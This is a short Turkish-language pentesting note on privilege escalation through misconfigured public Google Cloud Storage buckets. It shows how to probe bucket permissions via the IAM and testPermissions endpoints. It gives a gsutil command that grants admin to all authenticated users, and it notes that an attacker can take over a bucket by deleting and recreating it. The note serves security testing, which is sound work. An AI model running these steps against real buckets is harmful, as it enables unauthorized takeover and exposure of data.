GCP - Public Buckets Privilege Escalation

Kovalar Yetki Yükseltme

Eğer kova politikası "allUsers" veya "allAuthenticatedUsers"ın kova politikasını değiştirmesine izin veriyorsa (storage.buckets.setIamPolicy izni), herhangi biri kova politikasını değiştirip kendisine tam erişim sağlayabilir.

İzinleri Kontrol Etme

Bir kova üzerindeki izinleri kontrol etmek için 2 yöntem vardır. İlk yöntem, https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam adresine bir istek yaparak veya gsutil iam get gs://BUCKET_NAME komutunu çalıştırarak izinleri sormaktır.

Ancak, kullanıcınızın (potansiyel olarak allUsers veya allAuthenticatedUsers'a ait olabilir) kova iam politikasını okuma izni (storage.buckets.getIamPolicy) yoksa, bu çalışmayacaktır.

Her zaman çalışacak diğer seçenek, kovanın testPermissions uç noktasını kullanarak belirli bir izne sahip olup olmadığınızı belirlemektir. Örneğin, şu adrese erişerek: https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update

Yükseltme

Storage Admin yetkisini allAuthenticatedUsersa vermek için aşağıdaki komutu çalıştırabilirsiniz:

gsutil iam ch group:allAuthenticatedUsers:admin gs://BUCKET_NAME

Başka bir saldırı, sahipliği çalmak için kovayı kaldırmak ve kendi hesabınızda yeniden oluşturmaktır.

Referanslar

• https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/